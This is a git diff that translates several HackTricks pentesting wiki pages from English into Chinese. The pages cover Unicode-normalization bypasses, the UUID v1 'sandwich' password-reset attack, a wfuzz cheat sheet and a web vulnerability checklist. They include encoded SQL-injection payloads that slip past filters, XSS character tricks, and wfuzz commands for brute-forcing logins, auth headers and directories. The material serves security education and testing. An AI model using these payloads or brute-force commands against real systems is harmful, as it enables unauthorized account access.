+- **字节表示**：代码点（或字符）在内存中由一个或多个字节表示。例如，LATIN-1 字符（在英语国家常见）使用一个字节表示。然而，字符集较大的语言需要更多字节进行表示。
+- **编码**：这个术语指的是字符如何转换为一系列字节。UTF-8 是一种流行的编码标准，其中 ASCII 字符使用一个字节表示，其他字符最多使用四个字节。
+- **处理数据**：处理数据的系统必须了解所使用的编码，以正确地将字节流转换为字符。
+- **UTF 的变体**：除了 UTF-8，还有其他编码标准，如 UTF-16（使用最少 2 个字节，最多 4 个）和 UTF-32（对所有字符使用 4 个字节）。
 
-It's crucial to comprehend these concepts to effectively handle and mitigate potential issues arising from Unicode's complexity and its various encoding methods.
-
-An example of how Unicode normalise two different bytes representing the same character:
+理解这些概念对于有效处理和减轻因 Unicode 的复杂性及其各种编码方法而产生的潜在问题至关重要。
 
+Unicode 如何规范化两个表示相同字符的不同字节的示例：
 ```python
 unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "chlo\u00e9")
 ```
+**Unicode 等效字符列表可以在这里找到：** [https://appcheck-ng.com/wp-content/uploads/unicode_normalization.html](https://appcheck-ng.com/wp-content/uploads/unicode_normalization.html) 和 [https://0xacb.com/normalization_table](https://0xacb.com/normalization_table)
 
-**A list of Unicode equivalent characters can be found here:** [https://appcheck-ng.com/wp-content/uploads/unicode_normalization.html](https://appcheck-ng.com/wp-content/uploads/unicode_normalization.html) and [https://0xacb.com/normalization_table](https://0xacb.com/normalization_table)
+### 发现
 
-### Discovering
+如果你能在一个 webapp 中找到一个被回显的值，你可以尝试发送 **‘KELVIN SIGN’ (U+0212A)**，它 **规范化为 "K"**（你可以将其发送为 `%e2%84%aa`）。 **如果回显了 "K"**，那么某种 **Unicode 规范化** 正在进行。
 
-If you can find inside a webapp a value that is being echoed back, you could try to send **‘KELVIN SIGN’ (U+0212A)** which **normalises to "K"** (you can send it as `%e2%84%aa`). **If a "K" is echoed back**, then, some kind of **Unicode normalisation** is being performed.
+另一个 **例子**：`%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` 在 **unicode** 之后是 `Leonishan`。
 
-Other **example**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83` after **unicode** is `Leonishan`.
+## **易受攻击的示例**
 
-## **Vulnerable Examples**
+### **SQL 注入过滤器绕过**
 
-### **SQL Injection filter bypass**
+想象一个网页，它使用字符 `'` 来创建带有用户输入的 SQL 查询。这个网页作为安全措施，**删除** 用户输入中所有出现的字符 **`'`**，但 **在删除之后** 和 **在创建** 查询之前，它 **使用 Unicode** 对用户的输入进行 **规范化**。
 
-Imagine a web page that is using the character `'` to create SQL queries with the user input. This web, as a security measure, **deletes** all occurrences of the character **`'`** from the user input, but **after that deletion** and **before the creation** of the query, it **normalises** using **Unicode** the input of the user.
-
-Then, a malicious user could insert a different Unicode character equivalent to `' (0x27)` like `%ef%bc%87` , when the input gets normalised, a single quote is created and a **SQLInjection vulnerability** appears:
+然后，一个恶意用户可以插入一个不同的 Unicode 字符，等同于 `' (0x27)`，如 `%ef%bc%87`，当输入被规范化时，会创建一个单引号，从而出现 **SQL 注入漏洞**：
 
 ![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../images/image (702).png>)
 
-**Some interesting Unicode characters**
+**一些有趣的 Unicode 字符**
 
 - `o` -- %e1%b4%bc
 - `r` -- %e1%b4%bf
@@ -62,7 +60,6 @@ Then, a malicious user could insert a different Unicode character equivalent to
 - `'` -- %ef%bc%87
 - `"` -- %ef%bc%82
 - `|` -- %ef%bd%9c
-
 ```
 ' or 1=1-- -
 %ef%bc%87+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3
@@ -76,32 +73,30 @@ Then, a malicious user could insert a different Unicode character equivalent to
 " || 1==1//
 %ef%bc%82+%ef%bd%9c%ef%bd%9c+%c2%b9%e2%81%bc%e2%81%bc%c2%b9%ef%bc%8f%ef%bc%8f
 ```
-
-#### sqlmap template
+#### sqlmap 模板
 
 {% embed url="https://github.com/carlospolop/sqlmap_to_unicode_template" %}
 
-### XSS (Cross Site Scripting)
+### XSS (跨站脚本攻击)
 
-You could use one of the following characters to trick the webapp and exploit a XSS:
+您可以使用以下字符之一来欺骗 web 应用程序并利用 XSS：
 
 ![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../images/image (312) (2).png>)
 
-Notice that for example the first Unicode character purposed can be sent as: `%e2%89%ae` or as `%u226e`
+请注意，例如，第一个提议的 Unicode 字符可以发送为：`%e2%89%ae` 或 `%u226e`
 
 ![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../images/image (215) (1) (1).png>)
 
-### Fuzzing Regexes
+### 模糊测试正则表达式
 
-When the backend is **checking user input with a regex**, it might be possible that the **input** is being **normalized** for the **regex** but **not** for where it's being **used**. For example, in an Open Redirect or SSRF the regex might be **normalizing the sent UR**L but then **accessing it as is**.
+当后端 **使用正则表达式检查用户输入** 时，**输入** 可能会为 **正则表达式** 进行 **规范化**，但 **不** 会为其 **使用** 的地方进行 **规范化**。例如，在开放重定向或 SSRF 中，正则表达式可能会 **规范化发送的 URL**，但随后 **按原样访问**。
 
-The tool [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* allows to **generate variation of the input** to fuzz the backend. Fore more info check the **github** and this [**post**](https://0xacb.com/2022/11/21/recollapse/).
+工具 [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\* 允许 **生成输入的变体** 以模糊测试后端。有关更多信息，请查看 **github** 和这篇 [**文章**](https://0xacb.com/2022/11/21/recollapse/)。
 
-## References
+## 参考文献
 
 - [**https://labs.spotify.com/2013/06/18/creative-usernames/**](https://labs.spotify.com/2013/06/18/creative-usernames/)
 - [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
 - [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass_WAF_Unicode.html)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/uuid-insecurities.md b/src/pentesting-web/uuid-insecurities.md
index 9534f3dec..a6793a9ce 100644
--- a/src/pentesting-web/uuid-insecurities.md
+++ b/src/pentesting-web/uuid-insecurities.md
@@ -1,66 +1,65 @@
-# UUID Insecurities
+# UUID 不安全性
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-Universally Unique Identifiers (UUIDs) are **128-bit numbers used to uniquely identify information** in computer systems. UUIDs are essential in applications where unique identifiers are necessary without central coordination. They are commonly used as database keys and can refer to various elements like documents and sessions.
+通用唯一标识符 (UUID) 是 **用于唯一标识计算机系统中信息的 128 位数字**。UUID 在需要唯一标识符而无需中央协调的应用程序中至关重要。它们通常用作数据库键，并可以引用各种元素，如文档和会话。
 
-UUIDs are designed to be unique and **hard to guess**. They are structured in a specific format, divided into five groups represented as 32 hexadecimal digits. There are different versions of UUIDs, each serving different purposes:
+UUID 旨在是唯一的，并且 **难以猜测**。它们以特定格式结构化，分为五组，表示为 32 个十六进制数字。UUID 有不同的版本，每个版本服务于不同的目的：
 
-- **UUID v1** is time-based, incorporating the timestamp, clock sequence, and node ID (MAC address), but it can potentially expose system information.
-- **UUID v2** is similar to v1 but includes modifications for local domains (not widely used).
-- **UUID v3 and v5** generate UUIDs using hash values from namespace and name, with v3 using MD5 and v5 using SHA-1.
-- **UUID v4** is generated almost entirely randomly, providing a high level of anonymity but with a slight risk of duplicates.
+- **UUID v1** 是基于时间的，包含时间戳、时钟序列和节点 ID（MAC 地址），但可能会暴露系统信息。
+- **UUID v2** 类似于 v1，但包含针对本地域的修改（使用不广泛）。
+- **UUID v3 和 v5** 使用来自命名空间和名称的哈希值生成 UUID，v3 使用 MD5，v5 使用 SHA-1。
+- **UUID v4** 几乎完全随机生成，提供高水平的匿名性，但存在轻微的重复风险。
 
 > [!TIP]
-> Note that the version and subversion of the UUID usually appears in the same possition inside the UUID. For example in:\
+> 请注意，UUID 的版本和子版本通常出现在 UUID 内的相同位置。例如在：\
 > 12345678 - abcd - 1a56 - a539 - 103755193864\
 > xxxxxxxx - xxxx - Mxxx - Nxxx - xxxxxxxxxxxx
 >
-> - The **position of the M** Indicates the UUID **version**. In the example above, it’s UUID v**1**.
-> - The **position of the N** Indicates the UUID variant.
+> - **M 的位置** 表示 UUID 的 **版本**。在上面的示例中，它是 UUID v**1**。
+> - **N 的位置** 表示 UUID 变体。
 
-## Sandwich attack
+## 三明治攻击
 
-The "Sandwich Attack" is a specific type of attack that **exploits the predictability of UUID v1 generation in web applications**, particularly in features like password resets. UUID v1 is generated based on time, clock sequence, and the node's MAC address, which can make it somewhat predictable if an attacker can obtain some of these UUIDs generated close in time.
+“三明治攻击”是一种特定类型的攻击，**利用了 web 应用程序中 UUID v1 生成的可预测性**，特别是在密码重置等功能中。UUID v1 是基于时间、时钟序列和节点的 MAC 地址生成的，如果攻击者能够获取一些在时间上接近生成的 UUID，这可能使其在某种程度上可预测。
 
-### Example
+### 示例
 
-Imagine a web application that uses UUID v1 for generating password reset links. Here’s how an attacker might exploit this to gain unauthorized access:
+想象一个使用 UUID v1 生成密码重置链接的 web 应用程序。攻击者可能如何利用这一点来获得未授权访问：
 
-1. **Initial Setup**:
+1. **初始设置**：
 
-- The attacker has control over two email accounts: \`attacker1@acme.com\` and \`attacker2@acme.com\`.
-- The target's email account is \`victim@acme.com\`.
+- 攻击者控制两个电子邮件帐户：\`attacker1@acme.com\` 和 \`attacker2@acme.com\`。
+- 目标的电子邮件帐户是 \`victim@acme.com\`。
 
-2. **Execution**:
+2. **执行**：
 
-- The attacker triggers a password reset for their first account (\`attacker1@acme.com\`) and receives a password reset link with a UUID, say \`99874128-7592-11e9-8201-bb2f15014a14\`.
-- Immediately after, the attacker triggers a password reset for the victim's account (\`victim@acme.com\`) and then quickly for the second attacker-controlled account (\`attacker2@acme.com\`).
-- The attacker receives a reset link for the second account with a UUID, say \`998796b4-7592-11e9-8201-bb2f15014a14\`.
+- 攻击者为他们的第一个帐户（\`attacker1@acme.com\`）触发密码重置，并收到一个带有 UUID 的密码重置链接，比如 \`99874128-7592-11e9-8201-bb2f15014a14\`。
+- 紧接着，攻击者为受害者的帐户（\`victim@acme.com\`）触发密码重置，然后迅速为第二个攻击者控制的帐户（\`attacker2@acme.com\`）触发。
+- 攻击者收到第二个帐户的重置链接，带有 UUID，比如 \`998796b4-7592-11e9-8201-bb2f15014a14\`。
 
-3. **Analysis**:
+3. **分析**：
 
-- The attacker now has two UUIDs generated close in time (\`99874128\` and \`998796b4\`). Given the sequential nature of time-based UUIDs, the UUID for the victim's account will likely fall between these two values.
+- 攻击者现在有两个在时间上接近生成的 UUID（\`99874128\` 和 \`998796b4\`）。考虑到基于时间的 UUID 的顺序特性，受害者帐户的 UUID 很可能落在这两个值之间。
 
-4. **Brute Force Attack:**
+4. **暴力攻击**：
 
-- The attacker uses a tool to generate UUIDs between these two values and tests each generated UUID by attempting to access the password reset link (e.g., \`https://www.acme.com/reset/\<generated-UUID>\`).
-- If the web application does not adequately rate limit or block such attempts, the attacker can quickly test all possible UUIDs in the range.
+- 攻击者使用工具生成这两个值之间的 UUID，并通过尝试访问密码重置链接（例如 \`https://www.acme.com/reset/\<generated-UUID>\`）来测试每个生成的 UUID。
+- 如果 web 应用程序没有充分限制速率或阻止此类尝试，攻击者可以迅速测试范围内的所有可能 UUID。
 
-5. **Access Gained:**
+5. **获得访问权限**：
 
-- Once the correct UUID for the victim's password reset link is discovered, the attacker can reset the victim's password and gain unauthorized access to their account.
+- 一旦发现受害者密码重置链接的正确 UUID，攻击者可以重置受害者的密码并获得未授权访问其帐户的权限。
 
-### Tools
+### 工具
 
-- You can perform the sandwich attack automatically with the tool: [**https://github.com/Lupin-Holmes/sandwich**](https://github.com/Lupin-Holmes/sandwich)
-- You can detect these type of UUIds in Burp Suite with the extension [**UUID Detector**](https://portswigger.net/bappstore/65f32f209a72480ea5f1a0dac4f38248).
+- 您可以使用工具自动执行三明治攻击：[**https://github.com/Lupin-Holmes/sandwich**](https://github.com/Lupin-Holmes/sandwich)
+- 您可以使用扩展 [**UUID Detector**](https://portswigger.net/bappstore/65f32f209a72480ea5f1a0dac4f38248) 在 Burp Suite 中检测这些类型的 UUID。
 
-## References
+## 参考
 
 - [https://versprite.com/blog/universally-unique-identifiers/](https://versprite.com/blog/universally-unique-identifiers/)
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/web-tool-wfuzz.md b/src/pentesting-web/web-tool-wfuzz.md
index 8ee97702a..6b6f1e73f 100644
--- a/src/pentesting-web/web-tool-wfuzz.md
+++ b/src/pentesting-web/web-tool-wfuzz.md
@@ -2,22 +2,19 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-A tool to FUZZ web applications anywhere.
+一个可以在任何地方对 web 应用程序进行 FUZZ 的工具。
 
-> [Wfuzz](https://github.com/xmendez/wfuzz) has been created to facilitate the task in web applications assessments and it is based on a simple concept: it replaces any reference to the FUZZ keyword by the value of a given payload.
+> [Wfuzz](https://github.com/xmendez/wfuzz) 的创建旨在简化 web 应用程序评估的任务，基于一个简单的概念：它将任何对 FUZZ 关键字的引用替换为给定有效负载的值。
 
 ## Installation
 
-Installed in Kali
+在 Kali 中安装
 
 Github: [https://github.com/xmendez/wfuzz](https://github.com/xmendez/wfuzz)
-
 ```
 pip install wfuzz
 ```
-
-## Filtering options
-
+## 过滤选项
 ```bash
 --hs/ss "regex" #Hide/Show
 #Simple example, match a string: "Invalid username"
@@ -29,129 +26,95 @@ pip install wfuzz
 --hh/sh NUM #Hide/Show by number of chars in response
 --hc/sc NUM #Hide/Show by response code
 ```
-
-## Output options
-
+## 输出选项
 ```bash
 wfuzz -e printers #Prints the available output formats
 -f /tmp/output,csv #Saves the output in that location in csv format
 ```
-
-### Encoders options
-
+### 编码器选项
 ```bash
 wfuzz -e encoders #Prints the available encoders
 #Examples: urlencode, md5, base64, hexlify, uri_hex, doble urlencode
 ```
+为了使用编码器，您必须在 **"-w"** 或 **"-z"** 选项中指明它。
 
-In order to use an encoder, you have to indicate it in the **"-w"** or **"-z"** option.
-
-Examples:
-
+示例：
 ```bash
 -z file,/path/to/file,md5 #Will use a list inside the file, and will transform each value into its md5 hash before sending it
 -w /path/to/file,base64 #Will use a list, and transform to base64
 -z list,each-element-here,hexlify #Inline list and to hex before sending values
 ```
-
 ## CheatSheet
 
-### Login Form bruteforce
-
-#### **POST, Single list, filter string (hide)**
+### 登录表单暴力破解
 
+#### **POST，单列表，过滤字符串（隐藏）**
 ```bash
 wfuzz -c -w users.txt --hs "Login name" -d "name=FUZZ&password=FUZZ&autologin=1&enter=Sign+in" http://zipper.htb/zabbix/index.php
 #Here we have filtered by line
 ```
-
-#### **POST, 2 lists, filter code (show)**
-
+#### **POST, 2个列表, 过滤代码 (显示)**
 ```bash
 wfuzz.py -c -z file,users.txt -z file,pass.txt --sc 200 -d "name=FUZZ&password=FUZ2Z&autologin=1&enter=Sign+in" http://zipper.htb/zabbix/index.php
 #Here we have filtered by code
 ```
-
-#### **GET, 2 lists, filter string (show), proxy, cookies**
-
+#### **GET，2个列表，过滤字符串（显示），代理，cookies**
 ```bash
 wfuzz -c -w users.txt -w pass.txt --ss "Welcome " -p 127.0.0.1:8080:HTTP -b "PHPSESSIONID=1234567890abcdef;customcookie=hey" "http://example.com/index.php?username=FUZZ&password=FUZ2Z&action=sign+in"
 ```
+### 暴力破解目录/RESTful暴力破解
 
-### Bruteforce Directory/RESTful bruteforce
-
-[Arjun parameters wordlist](https://raw.githubusercontent.com/s0md3v/Arjun/master/arjun/db/params.txt)
-
+[Arjun参数字典](https://raw.githubusercontent.com/s0md3v/Arjun/master/arjun/db/params.txt)
 ```
 wfuzz -c -w /tmp/tmp/params.txt --hc 404 https://domain.com/api/FUZZ
 ```
-
-### Path Parameters BF
-
+### 路径参数 BF
 ```bash
 wfuzz -c -w ~/git/Arjun/db/params.txt --hw 11 'http://example.com/path%3BFUZZ=FUZZ'
 ```
+### 头部认证
 
-### Header Authentication
-
-#### **Basic, 2 lists, filter string (show), proxy**
-
+#### **基本，2个列表，过滤字符串（显示），代理**
 ```bash
 wfuzz -c -w users.txt -w pass.txt -p 127.0.0.1:8080:HTTP --ss "Welcome" --basic FUZZ:FUZ2Z "http://example.com/index.php"
 ```
-
-#### **NTLM, 2 lists, filter string (show), proxy**
-
+#### **NTLM, 2个列表, 过滤字符串 (显示), 代理**
 ```bash
 wfuzz -c -w users.txt -w pass.txt -p 127.0.0.1:8080:HTTP --ss "Welcome" --ntlm 'domain\FUZZ:FUZ2Z' "http://example.com/index.php"
 ```
+### Cookie/Header 暴力破解 (vhost 暴力)
 
-### Cookie/Header bruteforce (vhost brute)
-
-#### **Cookie, filter code (show), proxy**
-
+#### **Cookie，过滤代码 (显示)，代理**
 ```bash
 wfuzz -c -w users.txt -p 127.0.0.1:8080:HTTP --ss "Welcome " -H "Cookie:id=1312321&user=FUZZ"  "http://example.com/index.php"
 ```
-
-#### **User-Agent, filter code (hide), proxy**
-
+#### **用户代理，过滤代码（隐藏），代理**
 ```bash
 wfuzz -c -w user-agents.txt -p 127.0.0.1:8080:HTTP --ss "Welcome " -H "User-Agent: FUZZ"  "http://example.com/index.php"
 ```
-
-#### **Host**
-
+#### **主机**
 ```bash
 wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-
 top1million-20000.txt --hc 400,404,403 -H "Host: FUZZ.example.com" -u
 http://example.com -t 100
 ```
+### HTTP 动词（方法）暴力破解
 
-### HTTP Verbs (methods) bruteforce
-
-#### **Using file**
-
+#### **使用文件**
 ```bash
 wfuzz -c -w methods.txt -p 127.0.0.1:8080:HTTP --sc 200 -X FUZZ "http://example.com/index.php"
 ```
-
-#### **Using inline list**
-
+#### **使用内联列表**
 ```bash
 $ wfuzz -z list,GET-HEAD-POST-TRACE-OPTIONS -X FUZZ http://testphp.vulnweb.com/
 ```
-
-### Directory & Files Bruteforce
-
+### 目录和文件暴力破解
 ```bash
 #Filter by whitelisting codes
 wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --sc 200,202,204,301,302,307,403 http://example.com/uploads/FUZZ
 ```
-
-## Tool to bypass Webs
+## 绕过网络的工具
 
 [https://github.com/carlospolop/fuzzhttpbypass](https://github.com/carlospolop/fuzzhttpbypass)
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/web-vulnerabilities-methodology.md b/src/pentesting-web/web-vulnerabilities-methodology.md
index ad5a59ab9..165f19ce0 100644
--- a/src/pentesting-web/web-vulnerabilities-methodology.md
+++ b/src/pentesting-web/web-vulnerabilities-methodology.md
@@ -4,143 +4,142 @@
 
 <figure><img src="/images/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
 
-**Get a hacker's perspective on your web apps, network, and cloud**
+**从黑客的角度看待您的网络应用、网络和云**
 
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
+**发现并报告具有实际商业影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面，查找允许您提升权限的安全问题，并使用自动化利用收集重要证据，将您的辛勤工作转化为有说服力的报告。
 
 {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
-In every Web Pentest, there are **several hidden and obvious places that might be vulnerable**. This post is meant to be a checklist to confirm that you have searched for vulnerabilities in all the possible places.
+在每次Web Pentest中，有**几个隐藏和明显的地方可能存在漏洞**。这篇文章旨在作为一个检查清单，以确认您是否在所有可能的地方搜索了漏洞。
 
 ## Proxies
 
 > [!NOTE]
-> Nowadays **web** **applications** usually **uses** some kind of **intermediary** **proxies**, those may be (ab)used to exploit vulnerabilities. These vulnerabilities need a vulnerable proxy to be in place, but they usually also need some extra vulnerability in the backend.
+> 现在**网络** **应用程序**通常**使用**某种类型的**中介** **代理**，这些代理可能被（滥）用来利用漏洞。这些漏洞需要一个脆弱的代理存在，但通常还需要后端的某些额外漏洞。
 
-- [ ] [**Abusing hop-by-hop headers**](abusing-hop-by-hop-headers.md)
-- [ ] [**Cache Poisoning/Cache Deception**](cache-deception/)
-- [ ] [**HTTP Request Smuggling**](http-request-smuggling/)
-- [ ] [**H2C Smuggling**](h2c-smuggling.md)
-- [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)
-- [ ] [**Uncovering Cloudflare**](../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)
-- [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
-- [ ] [**Proxy / WAF Protections Bypass**](proxy-waf-protections-bypass.md)
+- [ ] [**滥用逐跳头**](abusing-hop-by-hop-headers.md)
+- [ ] [**缓存中毒/缓存欺骗**](cache-deception/)
+- [ ] [**HTTP请求走私**](http-request-smuggling/)
+- [ ] [**H2C走私**](h2c-smuggling.md)
+- [ ] [**服务器端包含/边缘端包含**](server-side-inclusion-edge-side-inclusion-injection.md)
+- [ ] [**揭露Cloudflare**](../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)
+- [ ] [**XSLT服务器端注入**](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
+- [ ] [**代理/WAF保护绕过**](proxy-waf-protections-bypass.md)
 
-## **User input**
+## **用户输入**
 
 > [!NOTE]
-> Most of the web applications will **allow users to input some data that will be processed later.**\
-> Depending on the structure of the data the server is expecting some vulnerabilities may or may not apply.
+> 大多数网络应用程序将**允许用户输入一些稍后将被处理的数据。**\
+> 根据服务器期望的数据结构，某些漏洞可能适用，也可能不适用。
 
-### **Reflected Values**
+### **反射值**
 
-If the introduced data may somehow be reflected in the response, the page might be vulnerable to several issues.
+如果输入的数据可能以某种方式反映在响应中，则页面可能会受到多种问题的影响。
 
-- [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md)
-- [ ] [**Command Injection**](command-injection.md)
+- [ ] [**客户端模板注入**](client-side-template-injection-csti.md)
+- [ ] [**命令注入**](command-injection.md)
 - [ ] [**CRLF**](crlf-0d-0a.md)
-- [ ] [**Dangling Markup**](dangling-markup-html-scriptless-injection/)
-- [ ] [**File Inclusion/Path Traversal**](file-inclusion/)
-- [ ] [**Open Redirect**](open-redirect.md)
-- [ ] [**Prototype Pollution to XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
-- [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)
-- [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery/)
-- [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/)
-- [ ] [**Reverse Tab Nabbing**](reverse-tab-nabbing.md)
-- [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
+- [ ] [**悬挂标记**](dangling-markup-html-scriptless-injection/)
+- [ ] [**文件包含/路径遍历**](file-inclusion/)
+- [ ] [**开放重定向**](open-redirect.md)
+- [ ] [**原型污染到XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
+- [ ] [**服务器端包含/边缘端包含**](server-side-inclusion-edge-side-inclusion-injection.md)
+- [ ] [**服务器端请求伪造**](ssrf-server-side-request-forgery/)
+- [ ] [**服务器端模板注入**](ssti-server-side-template-injection/)
+- [ ] [**反向标签窃取**](reverse-tab-nabbing.md)
+- [ ] [**XSLT服务器端注入**](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
 - [ ] [**XSS**](xss-cross-site-scripting/)
 - [ ] [**XSSI**](xssi-cross-site-script-inclusion.md)
-- [ ] [**XS-Search**](xs-search/)
+- [ ] [**XS-搜索**](xs-search/)
 
-Some of the mentioned vulnerabilities require special conditions, others just require the content to be reflected. You can find some interesting polygloths to test quickly the vulnerabilities in:
+一些提到的漏洞需要特殊条件，其他的只需要内容被反射。您可以找到一些有趣的多语言工具来快速测试漏洞：
 
 {{#ref}}
 pocs-and-polygloths-cheatsheet/
 {{#endref}}
 
-### **Search functionalities**
+### **搜索功能**
 
-If the functionality may be used to search some kind of data inside the backend, maybe you can (ab)use it to search arbitrary data.
+如果该功能可用于在后端搜索某种数据，您可能可以（滥）用它来搜索任意数据。
 
-- [ ] [**File Inclusion/Path Traversal**](file-inclusion/)
-- [ ] [**NoSQL Injection**](nosql-injection.md)
-- [ ] [**LDAP Injection**](ldap-injection.md)
+- [ ] [**文件包含/路径遍历**](file-inclusion/)
+- [ ] [**NoSQL注入**](nosql-injection.md)
+- [ ] [**LDAP注入**](ldap-injection.md)
 - [ ] [**ReDoS**](regular-expression-denial-of-service-redos.md)
-- [ ] [**SQL Injection**](sql-injection/)
-- [ ] [**XPATH Injection**](xpath-injection.md)
+- [ ] [**SQL注入**](sql-injection/)
+- [ ] [**XPATH注入**](xpath-injection.md)
 
-### **Forms, WebSockets and PostMsgs**
+### **表单、WebSockets和PostMsgs**
 
-When a websocket posts a message or a form allowing users to perform actions vulnerabilities may arise.
+当WebSocket发送消息或表单允许用户执行操作时，可能会出现漏洞。
 
-- [ ] [**Cross Site Request Forgery**](csrf-cross-site-request-forgery.md)
-- [ ] [**Cross-site WebSocket hijacking (CSWSH)**](websocket-attacks.md)
-- [ ] [**PostMessage Vulnerabilities**](postmessage-vulnerabilities/)
+- [ ] [**跨站请求伪造**](csrf-cross-site-request-forgery.md)
+- [ ] [**跨站WebSocket劫持（CSWSH）**](websocket-attacks.md)
+- [ ] [**PostMessage漏洞**](postmessage-vulnerabilities/)
 
-### **HTTP Headers**
+### **HTTP头**
 
-Depending on the HTTP headers given by the web server some vulnerabilities might be present.
+根据Web服务器提供的HTTP头，可能存在某些漏洞。
 
-- [ ] [**Clickjacking**](clickjacking.md)
-- [ ] [**Content Security Policy bypass**](content-security-policy-csp-bypass/)
-- [ ] [**Cookies Hacking**](hacking-with-cookies/)
-- [ ] [**CORS - Misconfigurations & Bypass**](cors-bypass.md)
+- [ ] [**点击劫持**](clickjacking.md)
+- [ ] [**内容安全策略绕过**](content-security-policy-csp-bypass/)
+- [ ] [**Cookies攻击**](hacking-with-cookies/)
+- [ ] [**CORS - 错误配置与绕过**](cors-bypass.md)
 
-### **Bypasses**
+### **绕过**
 
-There are several specific functionalities where some workarounds might be useful to bypass them
+有几个特定功能可能需要一些变通方法来绕过它们
 
-- [ ] [**2FA/OTP Bypass**](2fa-bypass.md)
-- [ ] [**Bypass Payment Process**](bypass-payment-process.md)
-- [ ] [**Captcha Bypass**](captcha-bypass.md)
-- [ ] [**Login Bypass**](login-bypass/)
-- [ ] [**Race Condition**](race-condition.md)
-- [ ] [**Rate Limit Bypass**](rate-limit-bypass.md)
-- [ ] [**Reset Forgotten Password Bypass**](reset-password.md)
-- [ ] [**Registration Vulnerabilities**](registration-vulnerabilities.md)
+- [ ] [**2FA/OTP绕过**](2fa-bypass.md)
+- [ ] [**绕过支付流程**](bypass-payment-process.md)
+- [ ] [**验证码绕过**](captcha-bypass.md)
+- [ ] [**登录绕过**](login-bypass/)
+- [ ] [**竞争条件**](race-condition.md)
+- [ ] [**速率限制绕过**](rate-limit-bypass.md)
+- [ ] [**重置忘记密码绕过**](reset-password.md)
+- [ ] [**注册漏洞**](registration-vulnerabilities.md)
 
-### **Structured objects / Specific functionalities**
+### **结构化对象/特定功能**
 
-Some functionalities will require the **data to be structured in a very specific format** (like a language serialized object or XML). Therefore, it's easier to identify if the application might be vulnerable as it needs to be processing that kind of data.\
-Some **specific functionalities** may be also vulnerable if a **specific format of the input is used** (like Email Header Injections).
+某些功能将要求**数据以非常特定的格式进行结构化**（如语言序列化对象或XML）。因此，更容易识别应用程序是否可能存在漏洞，因为它需要处理这种类型的数据。\
+某些**特定功能**也可能存在漏洞，如果使用**特定格式的输入**（如电子邮件头注入）。
 
-- [ ] [**Deserialization**](deserialization/)
-- [ ] [**Email Header Injection**](email-injections.md)
-- [ ] [**JWT Vulnerabilities**](hacking-jwt-json-web-tokens.md)
-- [ ] [**XML External Entity**](xxe-xee-xml-external-entity.md)
+- [ ] [**反序列化**](deserialization/)
+- [ ] [**电子邮件头注入**](email-injections.md)
+- [ ] [**JWT漏洞**](hacking-jwt-json-web-tokens.md)
+- [ ] [**XML外部实体**](xxe-xee-xml-external-entity.md)
 
-### Files
+### 文件
 
-Functionalities that allow uploading files might be vulnerable to several issues.\
-Functionalities that generate files including user input might execute unexpected code.\
-Users that open files uploaded by users or automatically generated including user input might be compromised.
+允许上传文件的功能可能会受到多种问题的影响。\
+生成包含用户输入的文件的功能可能会执行意外代码。\
+打开用户上传的文件或自动生成的包含用户输入的文件的用户可能会受到威胁。
 
-- [ ] [**File Upload**](file-upload/)
-- [ ] [**Formula Injection**](formula-csv-doc-latex-ghostscript-injection.md)
-- [ ] [**PDF Injection**](xss-cross-site-scripting/pdf-injection.md)
-- [ ] [**Server Side XSS**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
+- [ ] [**文件上传**](file-upload/)
+- [ ] [**公式注入**](formula-csv-doc-latex-ghostscript-injection.md)
+- [ ] [**PDF注入**](xss-cross-site-scripting/pdf-injection.md)
